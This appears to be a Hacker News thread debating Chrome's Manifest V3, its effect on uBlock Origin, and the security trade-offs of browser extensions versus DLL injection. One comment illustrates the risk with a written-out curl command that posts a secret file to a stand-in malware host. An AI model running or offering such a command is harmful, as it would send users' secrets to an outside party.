The problem with reality is that almost all software is still built on C. Kernels, userspace APIs, libraries, everything. I just wish that we would've gotten something like C ABIs, but with memory safety and VM-to-VM communication in mind, e.g. for Rust and Go, along the way. WebASM / WASI somehow got there, at least in that direction. But it's never seen as a shared object or dll replacement, and always is just a compile target and nothing more - even when the potential is there.
Something like that would solve so many problems that all kinds of programming language are trying to solve by themselves, over and over again.
Your personal site is awesome by the way! Though I got too excited about the CV "challenge" until I read on GitHub it really is just a random password you hand out to people and not a "find the secret password somewhere and trigger its" somewhere :p.
Cookie invaders gave me a good shock too :D. As well as the random "bloop" sounds. 10/10
Haha, thanks for the flowers. I tried to make my website fun to use while not sacrifing backwards compatibility.
PS: The crypto challenge is related to the song that the avatar is humming :)
Well, shit... now I must resist the urge to go back and figure it out! I've got things to do this weekend, couldn't you have lied and said it wasn't really a challenge! ;)
Yeah when I built that I was way too deep in the steganographic rabbit hole. Might have to rework it at some point, because it needs a deep understanding of how to use statistical analysis to find a key/alphabet, and the frames that don't match the previous audio frame so that the codec skips them as corrupt frames. It was the year after 3301 so well...I kind of overdid it :D
Maybe something assembly related would be fun to do, too. These days I am reversing lots of malware, so sth like patching a binary so that it evolves into a different program similar to how APE does it would be a fun challenge, I guess :D
I wish some brave enough (no relation to Brave) soul patched Blink so it became possible to delegate URL blocking decisions to an external process via some sort of IPC. In goes a full URL and maybe an opaque session ID so some state may be tracked, out goes a boolean value. Assume all are allowed if this process cannot be connected to.
You can already do this with a MITM proxy, and it works in all browsers.
I thought this was a cool idea, so I looked around for existing implementations and found https://github.com/barre/privaxy
Been a while since the last commit, so I'm not sure if it's maintained, but I might try adding it (or something similar) to my pihole.
Bypassing pinned certs is always going pass attention? (or whatever deliberately harder to lookup term they make up?)
https://news.ycombinator.com/item?id=41813480
https://m.youtube.com/watch?v=F8cT1YCsxgo
Would it be possible to do an OS level ad blocker that works similarly to uBO?
Seems unlikely with how many different ways ui elements are handles across an OS (including apps that do their own rendering). Though I bet you could block some subset of well known ones and block a lot of the network traffic that feeds ads.
Time to switch my last machine that still uses Chrome as the default.
chrome hasnt been cool for a while
V3 has some utterly/unnecessarily complicated shite going on, like offscreen documents, and I think it will get worse as time progresses. Google really needs some bludgeoning.
I have not kept up -what is the steel man argument for V3? Presumably Google has a rationale other than “ad blockers are bad for business”
Ad blocker-wise I think the best argument is that internalising the traffic blocking can be made a lot more efficient than putting a javascript interpreter in between.
The counter argument is that ad-blocking is an arms-race and the only reason a subset of traffic blocking methods is going to work at all is because there isn't a big enough incentive yet.
Other than that the arguments in favour of V3 are going to be about the same as for any API update. My guess is a few extra APIs and more granular permissions.
... can we just have a browser that has the functionality of uBlock Origin built-in?
Feeling nostalgic for a time when browsing HTTP wasn't such a persistently-adversarial experience :(
Well, the web is unusable without an adblocker. Time to move to another browser.
Can't we avoid the Manifest bullshit altogether?
I remember how IE plugins roles: just dll inject into the process.
Inject dll's from the internet right into the browser. Yes, let's!
I'm not convinced that this is a good idea, but I don't think that's the reason; don't all your dlls come from the internet?
My comment was sarcasm.
The difference here is are you downloading a random dll from a well known source or from http://free-vpn-fast-internet.dwnloadfree.ru/free-chrome-vpn...? My mom isn't going to know the difference and will click the big green DOWNLOAD NOW button blindly.
But that's not a difference, is it? Can't Windows enforce that DLLs have to be signed just like extensions?
Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.
A javascript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.
Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.
So it's best to limit what the extension can do to begin with.
My heavily downvoted comment was also a sarcasm.
So here's the dilemma:
- People are afraid of plugins "in the wild". People need some kind of centralized, managed "extension store"
- People complains about store policy like Manifest V3
I don't think a single mechanism can please both crowds.
And what's worse? Google doesn't actually care about the security of the the "store". Scam extensions are everywhere. The "audit process" are minimal, customer/developer service are essentially none, and Google only enforce rules that affect their ads business.
> don't all your dlls come from the internet?
Either from the "wild" internet or manifest v3 intranet.
Or can we do better? For example, a community can maintain an opensource "network control" DLL that allow users to enable/disable tamperscript-like firewall rules from uBlock or such.
Why not avoid all this unnecessary DDL overhead and just load as a kernel module?
TempleOS https://en.wikipedia.org/wiki/TempleOS
Chrome tries to block the majority of third-party software from injecting code into it:
https://blog.chromium.org/2017/11/reducing-chrome-crashes-ca...
yeah modern browsers are pretty secure, it's business moat.
Captain, we're sinking.
If only Mozilla hadn't wasted all that time and money and created a Chrome-comparable in stability/performance and Vivaldi-comparable in customization, we could've have an easy way out of this current mess...
(v3 drops not only ad-blockers but also user style managers, so a significant degradation of the web interfaces)
I daily drive Firefox. I haven't found a single website in years that's made me open Chrome. There's nothing slow about Firefox.
I don't daily drive because I have found them, plenty of other people complain about this to make this not unique
(though I'd eat that up for more ergonomic general use enabled by customizations)